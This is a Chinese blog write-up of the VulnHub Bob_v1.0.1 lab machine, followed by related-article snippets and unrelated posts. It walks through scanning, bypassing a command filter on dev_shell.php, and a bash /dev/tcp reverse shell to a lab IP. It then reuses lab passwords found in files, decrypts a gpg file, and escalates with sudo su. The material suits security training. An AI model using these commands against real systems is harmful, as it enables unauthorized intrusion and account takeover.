Bob_v1.0.1靶机

最新推荐文章于 2025-12-13 20:17:14 发布
原创 最新推荐文章于 2025-12-13 20:17:14 发布 · 494 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

IP扫描

端口扫描

nmap -p- -A 192.168.111.142

目录扫描

dirsearch -u  http://192.168.111.142

拼接一下扫描的目录没啥发现,一个robots文件,看看内容

访问了半天,发现只有/dev_shell.php有用,是一个命令执行的页面

dev_shell.php页面发现存在过滤,一些命令无法执行,执行whoami | ls,发现一个备份文件

通过访问页面直接下载下来,查看文件内容,看到过滤了一些命令

http://192.168.111.142/dev_shell.php.bak

直接尝试反弹shell

nc -lvnp 4444

浏览器执行,反弹成功

whoami | pwd&echo "bash -i >& /dev/tcp/192.168.111.147/4444 0>&1" | bash

提权

cd到home目录下,查看,发现有四个用户的家目录,先到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html

cd /home 
ls
cd bob
ls -al

查看文件,得到 jc 和 seb 的密码

cat .old_passwordfile.html
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret

cd Documents
ls

在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh

查看文件内容,没看懂,网上搜了一下,是藏头诗,密钥为 HARPOCRATES

返回DOcuments目录下,解密 login.txt.gpg ,没有权限

gpg -d login.txt.gpg

ssh登录其他用户尝试

ssh jc@192.168.111.142 -p 25468
Qwerty

再次解密,得到 bob 的密码

cd /home/bob/Documents
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
 
bob:b0bcat_

再看看 elliot 的家目录,发现一个 theadminisdumb.txt 文件

查看内容,这里提到他把密码改为了 theadminisdumb

ssh连接bob用户

ssh bob@192.168.111.142 -p 25468
b0bcat_

查看当前权限,显示为all,所有命令都可以

sudo -l

直接sudo su 提权成功

sudo su

陽陽yy
关注
Bob_v1.0.1靶机渗透测试
weixin_58786230的博客
08-03 459
【代码】Bob_v1.0.1靶机渗透测试。
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 413
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 3169
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 636
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 520
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
Bob_v1.0.1靶机复现
weixin_52956666的博客
08-07 362
发现里面说有一个没有保护的shell,电子邮件中包含该shell。有回显,尝试注入一句话木马,发现有的命令不能够执行。切换到家目录,发现有四个用户,切换到bob用户中。之前扫描端口的时候发现ssh开放端口是25468。靶机IP为192.168.112.169。发现可以执行所有操作,直接sudo su。因为免密操作发现有ssh功能,尝试登陆。发现了一个可执行的notes.sh文件。发现还是得从命令执行的地方找突破口。发现首字母都是大写,可能是藏头诗。发现有一个疑似存放密码的地方。sudo -l查看免密操作。
Bob_ 1.0.1靶机渗透
weixin_67832625的博客
10-11 798
bob用户看看,发现有个可能存放password的文件 .old_passwordfile.html。在 /bob/Documents 目录下发现了加密文件login.txt.gpg和Secret的目录。在Secret深处找到一个sh文件,经过研究发现这是一首藏头诗,得到密钥HARPOCRATES。发现theadminisdumb.txt文件,里面内容应该是 elliot 写给员工的信。看看刚刚/bob/Documents目录下没权限的文件是否能解密。好小子,离成功又近一步!
vulnbub系列:Bob_v1.0.1
jq_j37的博客
08-03 452
vulnbub系列:Bob_v1.0.1靶机,打靶文章
VulnHub:Bob 1.0.1靶机实战
Aukum的博客
07-08 993
VulnHub-Bob 1.0.1靶机。通过常规信息收集,借助&符号绕过过滤,通过命令执行进行反弹shell。主要考察的是Linux shell基础和信息收集能力。
精选资源
BOB1.0.1靶机渗透攻略.pdf
09-21
本篇文档详细介绍了针对名为 Bob 1.0.1靶机进行渗透攻击的实战攻略。靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一个提供实战环境的网站,允许用户下载靶场并进行渗透测试。 渗透攻击过程首先需要使用 Nmap ...
vulnhub_Bob 1.0.1 靶场渗透
qq_73212565的博客
11-17 343
vulnhub_bob 1.0.1
pcie笔记
bortonyu的博客
12-11 573
模式全称描述共用参考时钟Root Complex(RC)和 Endpoint(EP)使用同一颗外部 RefclkSRNSRC 和 EP 使用独立时钟源,但 不允许展频(SSC)SRISRC 和 EP 使用独立时钟源,允许各自带有 SSC 抖动txt复制编辑FS 表示信号的总摆幅,用于判断是否满足发送器输出的最大电压范围(如 800mV full swing)。Full Swing 模式下:FS ∈ [24, 63]Reduced Swing 模式下:FS ∈ [12, 63]
运放学习笔记
最新发布
Z97371539的博客
12-13 330
单电源运放是指仅使用单一电源电压(例如,+5V)和地(0V)作为电源供给的运放。也就是说,它只需要一个正电压和地作为参考电压,而不需要负电压。
吴恩达新课程:Agentic AI(笔记13)
cfy2401926342的博客
12-08 883
摘要:本文介绍了Agent系统中的规划设计模式,该模式使智能体能够自主决定执行复杂任务的工具调用序列,无需硬编码。以客服助理Agent为例,通过提供工具集和LLM编写结构化执行计划(如JSON格式),系统可灵活处理复杂查询。该模式扩展了任务范围,提高了灵活性,但也存在结果不稳定等风险。推荐使用Huggingface社区的smolagents框架,其简洁易用,适合开发者入门和定制化系统。结构化输出(如JSON)确保计划可靠解析和执行,提升系统稳定性。
先立后破:Linux 下“新建管理员 → 验证 → 禁用 root 远程 SSH”的零翻车笔记
weixin_45626288的博客
12-12 392
本文提供了一套零风险的Linux服务器安全加固流程,重点解决等保2.0要求的"禁用root远程SSH"需求。通过"先立后破"原则,先创建并验证新管理员账号的sudo权限,再禁用root远程登录,全程保持root会话不断开作为应急通道。关键步骤包括:创建新管理员账号、配置sudo权限、严格测试新账号功能、安全修改sshd配置、保留本地root登录权限等。文章特别强调验证环节的重要性,并提供了快速回滚方案,确保运维人员不会因配置失误导致服务器失联。这套方法适用于Kylin
Java Stream 数据处理笔记:从嵌套集合中过滤特定类别的Map
DolphinHome的博客
12-09 449
扁平化嵌套结构:使用flatMap将转换为Stream<T>过滤条件放置:在收集前进行过滤,避免处理不必要的数据空值安全:多层空值检查防止NPE性能优化先过滤后映射大数据量使用并行流使用合适的Map实现(如用于并行流)冲突处理:指定合并函数处理键冲突通过以上方法,您可以高效地从复杂嵌套结构中提取并过滤特定类别的数据,构建所需的Map结构。这种模式在实际项目中非常常见,掌握这些技巧能显著提升代码质量和开发效率。
笔记】创建systemctl服务
Word_And_Me_的博客
12-10 485
在 Linux 中通过systemctl管理 Python 脚本作为运行,核心是创建systemd服务配置文件(.service),让系统以守护进程方式启动 / 管理你的 Python 代码。
学习笔记095——Ubuntu 安装 lrzsz 服务?
code__bee的博客
12-10 368
lrzsz是一款基于协议的文件传输工具集,专门用于在终端环境下实现本地与远程服务器之间的文件上传和下载,是 Linux/Unix 运维和开发场景中常用的轻量级工具。
rk3576_linux_release_20241217_v1.0.1c.sdk.split00 rk3576_linux_release_20241217_v1.0.1c.sdk.split01 rk3576_linux_release_20241217_v1.0.1c.sdk.split02 如何合并解压
08-09
<think>我们面对的是多个分卷压缩文件,通常使用split或cat命令分割的大文件需要合并后才能解压。 文件名模式:rk3576_linux_release_20241217_v1.0.1c.sdk.split00, rk3576_linux_release_20241217_v1.0.1c.sdk.split01, ... 这种命名方式可能是由split命令生成的,默认分割后的文件后缀为split00, split01等。 合并步骤: 1. 确保所有分卷文件都在同一个目录下,并且按顺序连续(没有缺失)。 2. 使用cat命令按顺序合并这些分卷文件为一个完整的压缩包。 合并命令:cat rk3576_linux_release_20241217_v1.0.1c.sdk.split* > rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz 注意:这里假设分卷文件是按顺序命名的,使用通配符*会按字母顺序合并,而字母顺序就是split00,split01,...的顺序,所以是正确的。 3. 合并后得到完整的压缩包(可能是tar.gz格式),然后解压: tar -zxvf rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz 但是,请注意:有时分卷文件可能没有扩展名,或者扩展名不是.tar.gz,但根据Rockchip SDK的发布习惯,通常是tar.gz压缩包的分卷。 另外,如果分卷文件是使用split命令分割的,那么合并后就是原来的压缩文件。 还有一种情况:分卷文件可能是.tar.gz.00, .tar.gz.01等,但这里后缀是.split00, .split01,所以按照上述方式合并即可。 注意:如果合并后解压出错,可能是分卷文件损坏或缺失,请检查。 步骤详细说明: 1. 打开终端,进入存放分卷文件的目录。 2. 执行合并命令(确保有足够的磁盘空间): ```bash cat rk3576_linux_release_20241217_v1.0.1c.sdk.split* > rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz ``` 3. 解压合并后的文件: ```bash tar -zxvf rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz ``` 如果合并后解压时提示文件格式未知或损坏,可以尝试使用file命令查看合并后的文件类型: ```bash file rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz ``` 如果显示为gzip压缩文件,则解压命令正确;如果是其他格式,则调整解压命令。 另外,有时分卷文件可能是由其他压缩工具分割的,但Rockchip SDK通常使用tar.gz分卷,所以上述方法适用。 参考引用[1]中提到的SDK文件结构,合并解压后应该会得到类似于“Rockchip_RK3588_Linux5.10_SDK_Release_V1.4.0_20240508”的目录结构。 注意事项: - 确保在合并前有足够的磁盘空间(合并后的压缩包和解压后的目录都需要空间)。 - 确保所有分卷文件完整(可以通过校验md5值,如果提供了校验文件)。 如果提供了MD5校验文件,请先校验分卷文件的完整性。 例如,如果有一个md5sum.txt文件,内容为各个分卷的MD5值,那么可以运行: ```bash md5sum -c md5sum.txt ``` 如果没有提供,则只能尝试合并解压,如果出错再检查。 现在,我们来生成相关问题:</think>### 合并与解压 SDK 分卷文件指南 #### 步骤 1:合并分卷文件 使用 `cat` 命令按顺序合并所有分卷文件: ```bash cat rk3576_linux_release_20241217_v1.0.1c.sdk.split* > rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz ``` **说明**: - 通配符 `*` 会自动按数字顺序拼接文件(split00 → split01 → split02) - 合并后生成完整压缩包 `rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz` #### 步骤 2:解压合并后的文件 ```bash tar -zxvf rk3576_linux_release_20241217_v1.0.1c.sdk.tar.gz ``` **参数解析**: - `-z`:解压 gzip 压缩 - `-x`:执行解包操作 - `-v`:显示解压过程(可选) - `-f`:指定文件名 #### 验证解压结果 检查解压目录结构(参考 Rockchip SDK 典型结构[^1]): ``` rk3576_linux_sdk/ ├── app/ # 应用程序目录 ├── common/ # 公共配置文件 ├── kernel/ # Linux 内核源码 └── build.sh # 编译脚本 ``` #### 注意事项 1. **磁盘空间**:确保磁盘剩余空间 > 压缩包体积的 2 倍 2. **文件顺序**:必须保证所有分卷连续(如 split00 到 split02 无缺失) 3. **权限问题**:建议在普通用户下操作时添加 `sudo` 4. **完整性验证**:解压后运行 `find . -type f | wc -l` 对比文件数量 --- ### 常见问题排查 | 问题现象 | 解决方案 | |---------|---------| | `cat: file not found` | 检查文件名拼写(区分大小写) | | `tar: Unexpected EOF` | 分卷文件损坏或缺失,需重新下载 | | `Permission denied` | 使用 `sudo tar -zxvf ...` 提权操作 | | 解压后无 kernel 目录 | 确认 SDK 是否包含完整组件[^3] | --- ### 相关问题 1. 如何验证合并后的 SDK 文件完整性? 2. 解压后如何编译 Rockchip Linux SDK 的内核? 3. 遇到 `tar: invalid magic` 错误该如何解决? 4. 如何在 Windows 环境下合并 Linux SDK 分卷文件? 5. Rockchip SDK 中 `common/` 目录包含哪些关键配置?[^1] [^1]: Rockchip SDK 目录结构参考 Release_V1.4.0 文档 [^2]: Linux 驱动相关操作需内核支持 [^3]: RK35xx 系列开发板启动日志确认硬件兼容性
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值